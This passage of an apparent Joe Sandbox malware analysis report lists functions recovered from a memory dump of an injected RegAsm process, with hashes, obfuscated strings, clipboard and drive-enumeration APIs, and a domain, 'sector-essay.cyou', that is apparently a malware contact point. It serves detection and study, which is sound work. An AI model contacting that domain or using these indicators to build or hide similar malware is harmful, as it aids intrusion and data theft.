                          • Instruction Fuzzy Hash: 13B100B9A00216CFDB14CF28D84066EB7B1FF4A304F1981ADD405AB351EB35AD52CBD8
                          Function 00409410 Relevance: 10.4, Strings: 8, Instructions: 439COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: )x$CEa~$C}yD$FyOA$P$^!$`|Vz$9$
                          • API String ID: 0-1872272304
                          • Opcode ID: 7eba135c86ffd7cc95433c9f1a24ca243a7e8e9c30315bf08df24b183b5bbefe
                          • Instruction ID: 7358a85e4f1b823aa5a40fd208cc153005ab7fcb3a2e79ac82dfdcee323e6701
                          • Opcode Fuzzy Hash: 7eba135c86ffd7cc95433c9f1a24ca243a7e8e9c30315bf08df24b183b5bbefe
                          • Instruction Fuzzy Hash: 91C104325183918AD311CF29C45076BBBE1AF97344F0949AED8D4AB393D73AC909CB96
                          Function 0042C3D0 Relevance: 10.3, Strings: 8, Instructions: 266COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: $(''$)-$"$fi<b$h@KJ$u@wB$x}KH$yrt@$~FCs
                          • API String ID: 0-2904395653
                          • Opcode ID: 5ea25fac44711d14ca98305bc12f104743946438d3f160ddf0d10589975b9041
                          • Instruction ID: 7f5f47f6125ba2d91d2036908e94d2695878a208deecc13d885392006dd65dab
                          • Opcode Fuzzy Hash: 5ea25fac44711d14ca98305bc12f104743946438d3f160ddf0d10589975b9041
                          • Instruction Fuzzy Hash: 1891F5B0604B908BD3398F35D8917A7BBE2AF97304F58995DC0EB4B385C7386405CB59
                          Function 004255A4 Relevance: 10.2, Strings: 8, Instructions: 189COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: )Jmi$1Spt$BLJN$MlB$PnoL$[VQa$_fXl$x
                          • API String ID: 0-3329954981
                          • Opcode ID: bffe4769d9428dfeb9ce58624dac6c874f0d27eea85e15fd6356625d1823aa27
                          • Instruction ID: 0d9bc49bd01bd19d5d4c9f85ac95da40e29244f73e8c515b28de0e08d5a7ffe0
                          • Opcode Fuzzy Hash: bffe4769d9428dfeb9ce58624dac6c874f0d27eea85e15fd6356625d1823aa27
                          • Instruction Fuzzy Hash: A8515A327193A28BD730CA2490513E7FBE1EF56340F9A863EC585C7385D738A506D78A
                          Function 00427D61 Relevance: 9.3, Strings: 7, Instructions: 519COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: ""$2$7Rn~$Iy~s$obwa$ujcw$yd-K$yrtp
                          • API String ID: 0-1936000690
                          • Opcode ID: 45f60b8723551f83df897f121c5c623d2ff92b384759331cb993cd8d9bfebb53
                          • Instruction ID: a5d2def4d44e7aaff2e8781055e5261c298c51011e5ec9ecc35440d40ca5e48a
                          • Opcode Fuzzy Hash: 45f60b8723551f83df897f121c5c623d2ff92b384759331cb993cd8d9bfebb53
                          • Instruction Fuzzy Hash: 44F136B560C3518FD714DF24E89126BBBE1AF86304F08887DE5C587352EB39D90ACB96
                          Function 00433A50 Relevance: 9.1, APIs: 6, Instructions: 147clipboardCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                          • String ID:
                          • API String ID: 2832541153-0
                          • Opcode ID: db5356a85bfc6720e611b1c4f7cda29c597fe52265ba8501f91eb5461658473a
                          • Instruction ID: 48eca17094e2952ee5b1522901b7380c2bd319ec7efd6ff3a64039dacec39483
                          • Opcode Fuzzy Hash: db5356a85bfc6720e611b1c4f7cda29c597fe52265ba8501f91eb5461658473a
                          • Instruction Fuzzy Hash: 1E51E5B1908B828BD714AF7C984926EFFA0AB56321F04873ED4E5873C2D3389555C797
                          Function 0040AD20 Relevance: 9.1, Strings: 7, Instructions: 359COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: /X$HY$M_$nqN$SQ$W%U$_]
                          • API String ID: 0-922328653
                          • Opcode ID: adaf769dc07baa925b36d48b2974999ebd7d222f5462be74a140492f6f4a0a71
                          • Instruction ID: 9d35cec4eb88c975eaced11c3f356054b61f51290990f0a469af967a64148600
                          • Opcode Fuzzy Hash: adaf769dc07baa925b36d48b2974999ebd7d222f5462be74a140492f6f4a0a71
                          • Instruction Fuzzy Hash: F6C1057564C3848BD3248F2584A136BFBE2EBD1314F28C97EE8D51B381D7798805CB8A
                          Function 0042E0CB Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 309COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID: Gz~A$OOuH${BGy
                          • API String ID: 3664257935-673351052
                          • Opcode ID: 2a2c75dbf13ae53032da221de794be44316f2d1803b24fa489eba0d92d53847f
                          • Instruction ID: b4afd5d696ae46a79715fd04e902fb47bd62efa5cd512110a86a1c3d2419befd
                          • Opcode Fuzzy Hash: 2a2c75dbf13ae53032da221de794be44316f2d1803b24fa489eba0d92d53847f
                          • Instruction Fuzzy Hash: A09148717047418BE3258B3588817A3BBD2EFA2314F188A2ED4EB4B7C2D779B815C759
                          Function 00430082 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 222memoryCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: 0$rr3w$rr3w
                          • API String ID: 2525500382-585071120
                          • Opcode ID: e0d49dbfc58d60801ceb0d0a0c33fd01609994a53ada82c5faa9c820f58f335f
                          • Instruction ID: 6016c376eef58914c36b6832e60878505128e2830f523d5165e2a9528a75c50c
                          • Opcode Fuzzy Hash: e0d49dbfc58d60801ceb0d0a0c33fd01609994a53ada82c5faa9c820f58f335f
                          • Instruction Fuzzy Hash: 94C12B71108FC18AD332CA3888887D3BFD16B66324F084A6DD1FA8B6D2D2B96145C766
                          Function 0041990C Relevance: 6.7, Strings: 5, Instructions: 491COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: "onm$HK$R/A)$X?s9$v
                          • API String ID: 0-4191733568
                          • Opcode ID: 7257a3a036ce90b6866de9d76ed6032abfb4af58a26d17f0dd13f744aa4c2c9b
                          • Instruction ID: bb70e7f2f821a34659c7e6a6e036051f756378a1106bb9181ebdcbed6fe89c1f
                          • Opcode Fuzzy Hash: 7257a3a036ce90b6866de9d76ed6032abfb4af58a26d17f0dd13f744aa4c2c9b
                          • Instruction Fuzzy Hash: D412BCB56093818BC738CF24C8A57EBBBE1FF96304F08896DD4C98B295E7784545CB86
                          Function 00426F9E Relevance: 6.7, Strings: 5, Instructions: 415COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: ;:=<$Ny$bq$zj${`
                          • API String ID: 0-427255626
                          • Opcode ID: 4b8c90023f8c7e2326e5dee30178ce67bafacd6039eb097d48a4d42b6b4c4679
                          • Instruction ID: 9600335381a4ad5a763fe039fa12eb1047036e882436e7c8ea96b07542593d7b
                          • Opcode Fuzzy Hash: 4b8c90023f8c7e2326e5dee30178ce67bafacd6039eb097d48a4d42b6b4c4679
                          • Instruction Fuzzy Hash: D1E137B5A04206CFDB14CF69DC81A6EBBB2FF55304F5880A9E541AB362D734E942CF94
                          Function 004098C0 Relevance: 6.7, Strings: 5, Instructions: 410COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: -y{$5697ED7B3A758717FEE815EB403F5D54$X$XY$t|z
                          • API String ID: 0-3916512585
                          • Opcode ID: 71929b7cb78fade234d0af0284fb1bbfe974b8de8f9b96e23177f78a23c85248
                          • Instruction ID: 6d1683724e37c284d1767b87699e3bd02a350b4874d110cad8f44bb5add2a7dd
                          • Opcode Fuzzy Hash: 71929b7cb78fade234d0af0284fb1bbfe974b8de8f9b96e23177f78a23c85248
                          • Instruction Fuzzy Hash: 50C124716083808BE318DF35C85576BBBE5EBD1314F188A2DE5D69B392CB38C905CB86
                          Function 004290B1 Relevance: 6.6, Strings: 5, Instructions: 383COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: FX_M$P@EZ$aHXN$}PSU$}PSU}PSU}PSU}PSU
                          • API String ID: 0-3769906081
                          • Opcode ID: f45f3dab8cab5d2951a74eecad4c86154023a0410c5b8fb2b397da8f807a4f8b
                          • Instruction ID: cdf010998d352b622df295b76928b5259ab787b9826e66f06dd73327f37ace46
                          • Opcode Fuzzy Hash: f45f3dab8cab5d2951a74eecad4c86154023a0410c5b8fb2b397da8f807a4f8b
                          • Instruction Fuzzy Hash: 8BE12775E04251CFDB04CF68D8907ADBBB2AF4A314F2982A9D8146B3E2C7759D02CB94
                          Function 00426C90 Relevance: 6.5, Strings: 5, Instructions: 213COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: D}$Sp$S~$X_$sB
                          • API String ID: 0-2074769466
                          • Opcode ID: b3d578ceabb7e91782cd02d317d1b7f3f2e96c6f2b729bc3cad980b6991a411d
                          • Instruction ID: 764fa7655f74a2f121e6bca1a8d7645511b336d90907924af72623d28470fcdf
                          • Opcode Fuzzy Hash: b3d578ceabb7e91782cd02d317d1b7f3f2e96c6f2b729bc3cad980b6991a411d
                          • Instruction Fuzzy Hash: 3F5101B02083908BD7109F25E89266BBBF0FF92364F054A1DF5D58B391E7788905CB9B
                          Function 0042AB83 Relevance: 5.4, Strings: 4, Instructions: 386COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: 6/JT$;:=<$D/JT$FTGN
                          • API String ID: 0-2223222905
                          • Opcode ID: b30fec8d57be68d97ecf87f983db9025c2b0b2ba739a92f5e0b606a5f2878763
                          • Instruction ID: 8a88c06ab80c316f3aeb94003148513e405f01649903baca4afcd5b0dd57d601
                          • Opcode Fuzzy Hash: b30fec8d57be68d97ecf87f983db9025c2b0b2ba739a92f5e0b606a5f2878763
                          • Instruction Fuzzy Hash: E6D1AB75E00160CFCB14CF68D8517AEBBB2BF0A300F1A41ADE9516B392D7395D15CB9A
                          Function 004091B0 Relevance: 5.3, Strings: 4, Instructions: 261COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: O[M@$T(F&$UKKX$j
                          • API String ID: 0-1885386310
                          • Opcode ID: 97e84a6f11231ccd1c36d43f8651d917bf6311de1855abfe1527903d33f6c9e4
                          • Instruction ID: 6cf50836299448d37242e0f92cc58f33f00555e081f2aa65baf5a2ec525ff5bb
                          • Opcode Fuzzy Hash: 97e84a6f11231ccd1c36d43f8651d917bf6311de1855abfe1527903d33f6c9e4
                          • Instruction Fuzzy Hash: 1061B06014D3C18AD3118F2980E076BFFE0EFA7314F1845AEE8D55B382C779891ADB66
                          Function 00418E83 Relevance: 5.3, Strings: 4, Instructions: 256COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: At$VlVk$]]EX$^d^c
                          • API String ID: 0-2893682494
                          • Opcode ID: 937370a5f1a352b7117d604bb765efe6b8bee1564d4b1c3b5f93a126cadb7364
                          • Instruction ID: e408b536d8ea96a86f5c1d16ea42e08b2438d6e83c22bfc62619355d171567df
                          • Opcode Fuzzy Hash: 937370a5f1a352b7117d604bb765efe6b8bee1564d4b1c3b5f93a126cadb7364
                          • Instruction Fuzzy Hash: 698116B5508380CBE331AB24D8527EB77E1EF96308F04093DE5D887292E7794955CB5B
                          Function 0042A235 Relevance: 4.1, Strings: 3, Instructions: 323COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: D@$I^$Md
                          • API String ID: 0-4131734681
                          • Opcode ID: 4de84d16cd981aaefb993032dad4d1a30dacd358b2f0ceeccfcd92a9c5c60521
                          • Instruction ID: f0b977693b76beac5d1a3dbdc409a79a56d24bbcd65843350be76cf5f517929c
                          • Opcode Fuzzy Hash: 4de84d16cd981aaefb993032dad4d1a30dacd358b2f0ceeccfcd92a9c5c60521
                          • Instruction Fuzzy Hash: 29A13875E002258BCF24CFA8C8917AB77B1FF45314F19816ED896AF395EB384941CB45
                          Function 00428D61 Relevance: 4.0, Strings: 3, Instructions: 227COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: (+$fM.$KE
                          • API String ID: 0-2816184506
                          • Opcode ID: 4dc242b38a8d5bc5b7508cac9f95328175687f110da05bd0eedfc5c179a4f52f
                          • Instruction ID: 8f53063ee58306ac1f2b9de81cb91a000338831b88c2d8f9006311080da09921
                          • Opcode Fuzzy Hash: 4dc242b38a8d5bc5b7508cac9f95328175687f110da05bd0eedfc5c179a4f52f
                          • Instruction Fuzzy Hash: A57105B6E04214DFDB04CF64DC817AEBB72FF89310F1A4169E9046B395DB759812CB84
                          Function 0042C9E3 Relevance: 3.9, Strings: 3, Instructions: 193COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: ,"O$";$kfgk
                          • API String ID: 0-2346484820
                          • Opcode ID: aa9dedc1418fa798ad7630c511284e1a8f14e1ad3b7c790f528e686ce717650e
                          • Instruction ID: 7540dbb34f0aab74f8b3e3bae81456e2250203a5ca1ab448a2fd284ffa4cb292
                          • Opcode Fuzzy Hash: aa9dedc1418fa798ad7630c511284e1a8f14e1ad3b7c790f528e686ce717650e
                          • Instruction Fuzzy Hash: F15109B1205B908AC7268F36C4A03A7BBE2AF97214F9985AED5D74B347CB385406C718
                          Function 0040C795 Relevance: 3.8, Strings: 3, Instructions: 33COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: Y3@x$k "#$sector-essay.cyou
                          • API String ID: 0-1819320278
                          • Opcode ID: 1465832e7b58c4371a415bda3dc569beca77767b6d3a97be0d770cbfadde0780
                          • Instruction ID: e4bedc7c66ef88fb73c058dd61637da2bfc25202fb332dbb219011eaf45d0d7a
                          • Opcode Fuzzy Hash: 1465832e7b58c4371a415bda3dc569beca77767b6d3a97be0d770cbfadde0780
                          • Instruction Fuzzy Hash: 2BF0B4742083409FD7889F24DCD173BB7A2DB82304F54992DA182D32D2CBB9D806CF09
                          Function 00424957 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: DrivesLogical
                          • String ID: I=[;
                          • API String ID: 999431828-61854675
                          • Opcode ID: 6c59a45d7981fb6276eb4f0010b5d109190027263947946e3bee6ad9e4217679
                          • Instruction ID: fdd2558837e3522963ad8216888f43651256edf83e2524651161abf3b8abf33e
                          • Opcode Fuzzy Hash: 6c59a45d7981fb6276eb4f0010b5d109190027263947946e3bee6ad9e4217679
                          • Instruction Fuzzy Hash: 2A9143B1A00215CFDB14CFA9EC926AEBBB1FF85318F1585A9D451AF362D3389901CF58
                          Function 0043C3D0 Relevance: 3.2, Strings: 2, Instructions: 650COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: /.-,$f
                          • API String ID: 2994545307-268397193
                          • Opcode ID: 267390c10bd30d36a8619fe02524233a6dad70afb1cee84af233b9d0527f0f5f
                          • Instruction ID: d2b16895bd0021cb106197b5681fe6ffe89d9511de6163e5f169a64b9c0f981f
                          • Opcode Fuzzy Hash: 267390c10bd30d36a8619fe02524233a6dad70afb1cee84af233b9d0527f0f5f
                          • Instruction Fuzzy Hash: D622E2756083018FC714CF29C8D1A6BBBE2ABC9314F289A2EF4D197391D779D845CB4A
                          Function 00419ECF Relevance: 2.9, Strings: 2, Instructions: 437COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: ($^
                          • API String ID: 0-2972045208
                          • Opcode ID: a12676f9734d6a0a0bda6de865abc1a24d6cd79b0e11a44953e3c6254b2bc331
                          • Instruction ID: 2f598e9537973fb736bad82c5bd561de69ae8d1b02f69733910a915f7e0cb602
                          • Opcode Fuzzy Hash: a12676f9734d6a0a0bda6de865abc1a24d6cd79b0e11a44953e3c6254b2bc331
                          • Instruction Fuzzy Hash: 1AF110741083418FD725CF29C8A57ABBBE1FF86314F18886DD4C98B292D7399846CB57
                          Function 00403E70 Relevance: 2.9, Strings: 2, Instructions: 402COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: )$IEND
                          • API String ID: 0-707183367
                          • Opcode ID: 863a25de8cdc3a3279ca3097fa1484c5a50e6d75e7e334b4f08c48651f5ec0e5
                          • Instruction ID: ecb30bbfc98707852728fca67ccd6cc89ad65581e2d14f423743e414cef4b987
                          • Opcode Fuzzy Hash: 863a25de8cdc3a3279ca3097fa1484c5a50e6d75e7e334b4f08c48651f5ec0e5
                          • Instruction Fuzzy Hash: 17E1B0B1A087019FD310DF29D84471BBBE4BB94308F14493EF994AB382E779E915CB96
                          Function 0042ED09 Relevance: 2.8, Strings: 2, Instructions: 312COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: \eQZ$vT^4
                          • API String ID: 0-3607082246
                          • Opcode ID: 1f3e988b4aa76ab3f687d6e92620ed6dbf5d3dd5c00552b95ddbbb4f4ead08ee
                          • Instruction ID: 3b057a2223dc50d3023ddf38fb8fa413fa556e3f3f3c85b146c5146a78224abf
                          • Opcode Fuzzy Hash: 1f3e988b4aa76ab3f687d6e92620ed6dbf5d3dd5c00552b95ddbbb4f4ead08ee
                          • Instruction Fuzzy Hash: 3AA1B6707047918FE3258B36D4617B3BBE2AF52304F59896ED0EB87381D779A4098B16
                          Function 0042EDCA Relevance: 2.8, Strings: 2, Instructions: 310COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: \eQZ$vT^4
                          • API String ID: 0-3607082246
                          • Opcode ID: 17271100e52e72446431b4ba25b522317e322b2cd0d75d0d208a158024b20060
                          • Instruction ID: e5b8c5e402a2ca9d81720aa6e2d634f6837bebe6097875f4b01a460d8e1aebeb
                          • Opcode Fuzzy Hash: 17271100e52e72446431b4ba25b522317e322b2cd0d75d0d208a158024b20060
                          • Instruction Fuzzy Hash: 1BA1C4707047918FE3258B36D4617B3BBE2AF52304F59896ED0EB87381D779A4098B16
                          Function 0042E03F Relevance: 2.8, Strings: 2, Instructions: 287COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: \eQZ$vT^4
                          • API String ID: 0-3607082246
                          • Opcode ID: 3ec17b83a0cfc1261a6730cc03ff32b26a3bccff8d2e7f5fcc69799121595fee
                          • Instruction ID: 626986f943cacfe7cdee8c514adc803c7eed872e390f7135a9fdb6cd9b05e1ff
                          • Opcode Fuzzy Hash: 3ec17b83a0cfc1261a6730cc03ff32b26a3bccff8d2e7f5fcc69799121595fee
                          • Instruction Fuzzy Hash: C491B470604B908FE325CF36D4517B3BBE2AF53304F59896ED0EB87681D739A4098B26
                          Function 0042AA59 Relevance: 2.7, Strings: 2, Instructions: 234COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: \$dY
                          • API String ID: 0-3471542007
                          • Opcode ID: 7acb568cdc52ecc74af97a4787a3a3ad331d2af1e24d79d5e469179ee0ab82e4
                          • Instruction ID: 03c21bf36d51f01782684134e1a7ec2c5429c0a6a87f8c6afb469a8b13a2632c
                          • Opcode Fuzzy Hash: 7acb568cdc52ecc74af97a4787a3a3ad331d2af1e24d79d5e469179ee0ab82e4
                          • Instruction Fuzzy Hash: BB7187B2A443018FD718CF24C88179ABFB2FB46314F5A82ADE4525F391C7758486CBC5
                          Function 0041D330 Relevance: 2.7, Strings: 2, Instructions: 188COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: GU$P
                          • API String ID: 0-4264775118
                          • Opcode ID: f4b5ae4fce804300cc27d76100c5c2827f7801721f25e97db71a1ee733bdee20
                          • Instruction ID: 9765230f43f6f534d29c8484abfaa169658ff9908dd3c8eb9dc5dbdfa9da3dfc
                          • Opcode Fuzzy Hash: f4b5ae4fce804300cc27d76100c5c2827f7801721f25e97db71a1ee733bdee20
                          • Instruction Fuzzy Hash: 275102B44083518BD718CF25C4913ABBBF0EF96364F044A1DE4D58B291E37C8946CB9B
                          Function 0043FDE0 Relevance: 2.1, Strings: 1, Instructions: 854COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: bD
                          • API String ID: 0-341964956
                          • Opcode ID: f8624cd08b5e62a9b1cbd92fd9fb648ac32dbaed00b84c83359fa603dc2c8329
                          • Instruction ID: 797598d5b798d05eb88edb43405c4c1f0413fb6f14aefd465af797d458563e3a
                          • Opcode Fuzzy Hash: f8624cd08b5e62a9b1cbd92fd9fb648ac32dbaed00b84c83359fa603dc2c8329
                          • Instruction Fuzzy Hash: 35422339A48351CFD704CF28D8902AAB7F1FB8A324F1A887DD98587351D738D955CB86
                          Function 00423F26 Relevance: 2.1, Strings: 1, Instructions: 813COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: "BB
                          • API String ID: 0-2652194471
                          • Opcode ID: d02e0a206807257a0ad29544d9084e13304aeda90ad91bad4d34b989897f1b57
                          • Instruction ID: f433d89746e8063d1265eb30f93065ad954c5b9ac59068488884f58db9b4ec75
                          • Opcode Fuzzy Hash: d02e0a206807257a0ad29544d9084e13304aeda90ad91bad4d34b989897f1b57
                          • Instruction Fuzzy Hash: 8C42E276B04116CFDB08CF68EC917AEB7B2FB8A310F1981B8E511A7391D774A851CB94
                          Function 0041E304 Relevance: 2.0, Strings: 1, Instructions: 764COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2267116955.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: |}
                          • API String ID: 0-2241360599
